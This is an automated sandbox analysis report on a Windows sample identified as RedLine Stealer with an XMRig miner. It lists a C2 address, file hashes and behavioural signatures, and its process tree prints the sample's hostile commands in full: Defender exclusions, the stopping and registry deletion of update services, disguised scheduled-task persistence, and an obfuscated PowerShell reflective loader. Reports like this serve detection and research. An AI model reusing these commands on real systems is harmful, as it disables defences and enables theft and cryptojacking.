Analysis

  • max time kernel
    288s
  • max time network
    283s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    01/11/2022, 11:53

General

  • Target

    f890d8a63f58ba3621e7a79229b4faa72d3152268bf001a9eb4391a541241bf9.exe

  • Size

    2.5MB

  • MD5

    9b1cd01abdf7721f5da2ca0e64c537db

  • SHA1

    bf9ca76f4e4471b0308c04adb6378c53dc698beb

  • SHA256

    f890d8a63f58ba3621e7a79229b4faa72d3152268bf001a9eb4391a541241bf9

  • SHA512

    10fe6440c7f53ca7574a5bec8002e43311aceb23432b63735cabef40b633ffb058e23fb582c230ab277c631b5724855ed3668fe8bccd97f01e3c4acb2950db6c

  • SSDEEP

    24576:SG9tAHzpWXnQpYGY61J01WpMGfdX1e9koNwLR4kbVCiR4Cx79YHrLFs2Pl3RuQ5f:SG9tAHkXnK05NwLrdx79YHr7l3p

Malware Config

Extracted

Family

redline

C2

62.204.41.141:24758

Attributes
  • auth_value

    ee9765957cfd6ee1553b0bf640f2d6aa

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:472
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Sets service image path in registry
      • Suspicious behavior: LoadsDriver
      • Suspicious use of AdjustPrivilegeToken
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k RPCSS
        2⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:592
        • C:\Windows\system32\winlogon.exe
          winlogon.exe
          1⤵
            PID:416
            • C:\Windows\SysWOW64\dllhost.exe
              C:\Windows\SysWOW64\dllhost.exe /Processid:{817a5a63-9f05-44d7-894a-154ca5186c10}
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{4c6a2e01-dd70-4d02-916f-44b1e925d4c9}
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2456
          • C:\Windows\system32\lsm.exe
            C:\Windows\system32\lsm.exe
            1⤵
              PID:480
            • C:\Users\Admin\AppData\Local\Temp\f890d8a63f58ba3621e7a79229b4faa72d3152268bf001a9eb4391a541241bf9.exe
              "C:\Users\Admin\AppData\Local\Temp\f890d8a63f58ba3621e7a79229b4faa72d3152268bf001a9eb4391a541241bf9.exe"
              1⤵
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:1672
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                2⤵
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:188832
                • C:\Users\Admin\AppData\Local\Microsoft\brave.exe
                  "C:\Users\Admin\AppData\Local\Microsoft\brave.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:189128
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:188868
                  • C:\Windows\system32\cmd.exe
                    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    4⤵
                      PID:1928
                      • C:\Windows\system32\sc.exe
                        sc stop UsoSvc
                        5⤵
                        • Launches sc.exe
                        PID:864
                      • C:\Windows\system32\sc.exe
                        sc stop WaaSMedicSvc
                        5⤵
                        • Launches sc.exe
                        PID:824
                      • C:\Windows\system32\sc.exe
                        sc stop wuauserv
                        5⤵
                        • Launches sc.exe
                        PID:452
                      • C:\Windows\system32\sc.exe
                        sc stop bits
                        5⤵
                        • Launches sc.exe
                        PID:1864
                      • C:\Windows\system32\sc.exe
                        sc stop dosvc
                        5⤵
                        • Launches sc.exe
                        PID:1460
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        5⤵
                          PID:936
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                          5⤵
                            PID:1092
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                            5⤵
                            • Modifies security service
                            PID:752
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                            5⤵
                              PID:1364
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                              5⤵
                                PID:392
                            • C:\Windows\system32\cmd.exe
                              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              4⤵
                                PID:1736
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-ac 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1140
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1636
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1892
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-dc 0
                                  5⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2020
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:108
                                • C:\Windows\system32\schtasks.exe
                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                  5⤵
                                  • Creates scheduled task(s)
                                  PID:776
                              • C:\Windows\system32\dialer.exe
                                C:\Windows\system32\dialer.exe
                                4⤵
                                • Drops file in Windows directory
                                PID:1852
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:972
                                • C:\Windows\system32\schtasks.exe
                                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                                  5⤵
                                    PID:2076
                              • C:\Users\Admin\AppData\Local\Microsoft\chrome.exe
                                "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • Suspicious use of WriteProcessMemory
                                PID:189152
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:189216
                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                  SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:189240
                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                  SCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:189324
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 189152 -s 200
                                  4⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  PID:189344
                              • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe
                                "C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:189180
                                • C:\Windows\system32\cmd.exe
                                  "cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:189400
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                    5⤵
                                    • Creates scheduled task(s)
                                    PID:189432
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {700D04EC-188A-4513-A561-3CA323C19CD8} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
                            1⤵
                              PID:1716
                              • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:384
                            • C:\Windows\system32\taskeng.exe
                              taskeng.exe {C370CC8B-2A13-41A8-A717-496C8148338B} S-1-5-18:NT AUTHORITY\System:Service:
                              1⤵
                              • Loads dropped DLL
                              PID:2092
                              • C:\Program Files\Google\Chrome\updater.exe
                                "C:\Program Files\Google\Chrome\updater.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Drops file in Program Files directory
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2140
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  3⤵
                                  • Drops file in System32 directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2700
                                • C:\Windows\system32\cmd.exe
                                  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                  3⤵
                                    PID:2908
                                    • C:\Windows\system32\sc.exe
                                      sc stop UsoSvc
                                      4⤵
                                      • Launches sc.exe
                                      PID:2980
                                    • C:\Windows\system32\sc.exe
                                      sc stop WaaSMedicSvc
                                      4⤵
                                      • Launches sc.exe
                                      PID:3080
                                    • C:\Windows\system32\sc.exe
                                      sc stop wuauserv
                                      4⤵
                                      • Launches sc.exe
                                      PID:3124
                                    • C:\Windows\system32\sc.exe
                                      sc stop bits
                                      4⤵
                                      • Launches sc.exe
                                      PID:3184
                                    • C:\Windows\system32\sc.exe
                                      sc stop dosvc
                                      4⤵
                                      • Launches sc.exe
                                      PID:3200
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                      4⤵
                                        PID:3216
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                        4⤵
                                          PID:3228
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                          4⤵
                                            PID:3240
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                            4⤵
                                              PID:3252
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                              4⤵
                                                PID:3264
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                              3⤵
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2932
                                              • C:\Windows\system32\schtasks.exe
                                                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                4⤵
                                                • Creates scheduled task(s)
                                                PID:3092
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              3⤵
                                                PID:2920
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3064
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3112
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3136
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3168
                                              • C:\Windows\system32\dialer.exe
                                                C:\Windows\system32\dialer.exe xtrjicqmdliu
                                                3⤵
                                                  PID:3276
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                    4⤵
                                                    • Drops file in Program Files directory
                                                    PID:3288
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                                                      5⤵
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3336
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                                                  3⤵
                                                  • Drops file in Program Files directory
                                                  PID:3312
                                                • C:\Windows\system32\dialer.exe
                                                  C:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=
                                                  3⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3392
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                2⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Drops file in System32 directory
                                                • Suspicious use of SetThreadContext
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2164
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                                2⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Drops file in System32 directory
                                                • Suspicious use of SetThreadContext
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2184

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Program Files\Google\Chrome\updater.exe

                                              Filesize

                                              2.8MB

                                              MD5

                                              eb27bb8cfa99d659e4fe023e9002ecd1

                                              SHA1

                                              c783400302fdfae0518269c5a5a8d4bad29f42a3

                                              SHA256

                                              9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                              SHA512

                                              ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                            • C:\Program Files\Google\Chrome\updater.exe

                                              Filesize

                                              2.8MB

                                              MD5

                                              eb27bb8cfa99d659e4fe023e9002ecd1

                                              SHA1

                                              c783400302fdfae0518269c5a5a8d4bad29f42a3

                                              SHA256

                                              9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                              SHA512

                                              ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                            • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                              Filesize

                                              2.8MB

                                              MD5

                                              9253ed091d81e076a3037e12af3dc871

                                              SHA1

                                              ec02829a25b3bf57ad061bbe54180d0c99c76981

                                              SHA256

                                              78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                              SHA512

                                              29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                            • C:\Users\Admin\AppData\Local\Microsoft\brave.exe

                                              Filesize

                                              2.8MB

                                              MD5

                                              9253ed091d81e076a3037e12af3dc871

                                              SHA1

                                              ec02829a25b3bf57ad061bbe54180d0c99c76981

                                              SHA256

                                              78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

                                              SHA512

                                              29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

                                            • C:\Users\Admin\AppData\Local\Microsoft\chrome.exe

                                              Filesize

                                              6.8MB

                                              MD5

                                              73b9004ff373f3b7b2f595541deb5a02

                                              SHA1

                                              bbc01bab5ae8ed8db2359c3b8a81eed75db5c061

                                              SHA256

                                              b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7

                                              SHA512

                                              908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4

                                            • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

                                              Filesize

                                              9KB

                                              MD5

                                              a169fb1a323c970f7a169b30657112cc

                                              SHA1

                                              5347dc5c0fe604f8527e336dd09a522fef0af9db

                                              SHA256

                                              97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                              SHA512

                                              8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                            • C:\Users\Admin\AppData\Local\Microsoft\ofg.exe

                                              Filesize

                                              9KB

                                              MD5

                                              a169fb1a323c970f7a169b30657112cc

                                              SHA1

                                              5347dc5c0fe604f8527e336dd09a522fef0af9db

                                              SHA256

                                              97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                              SHA512

                                              8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                            • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe

                                              Filesize

                                              9KB

                                              MD5

                                              a169fb1a323c970f7a169b30657112cc

                                              SHA1

                                              5347dc5c0fe604f8527e336dd09a522fef0af9db

                                              SHA256

                                              97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                              SHA512

                                              8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                            • C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe

                                              Filesize

                                              9KB

                                              MD5

                                              a169fb1a323c970f7a169b30657112cc

                                              SHA1

                                              5347dc5c0fe604f8527e336dd09a522fef0af9db

                                              SHA256

                                              97ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04

                                              SHA512

                                              8bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                              Filesize

                                              7KB

                                              MD5

                                              6c80c575f53a7db982dcf774dcf9f985

                                              SHA1

                                              61ba58d70ee7e6749ff5d5c6eb922efa8f4c4199

                                              SHA256

                                              084fd35ff577e0a7ecb3da180b9fa1fe4a8a3ebb7178143c31757fb74e292ab8

                                              SHA512

                                              7add73c825ed745d406dea080e49de6bb248cbce71c38621cfb03849f44d43f7168e74ea44c8af139921590674070d51f35d4a8a597175478c0ac584211c789c

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                              Filesize

                                              7KB

                                              MD5

                                              6c80c575f53a7db982dcf774dcf9f985

                                              SHA1

                                              61ba58d70ee7e6749ff5d5c6eb922efa8f4c4199

                                              SHA256

                                              084fd35ff577e0a7ecb3da180b9fa1fe4a8a3ebb7178143c31757fb74e292ab8

                                              SHA512

                                              7add73c825ed745d406dea080e49de6bb248cbce71c38621cfb03849f44d43f7168e74ea44c8af139921590674070d51f35d4a8a597175478c0ac584211c789c

                                            • \Program Files\Google\Chrome\updater.exe

                                              Filesize

                                              2.8MB

                                              MD5

                                              eb27bb8cfa99d659e4fe023e9002ecd1

                                              SHA1

                                              c783400302fdfae0518269c5a5a8d4bad29f42a3

                                              SHA256

                                              9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                              SHA512

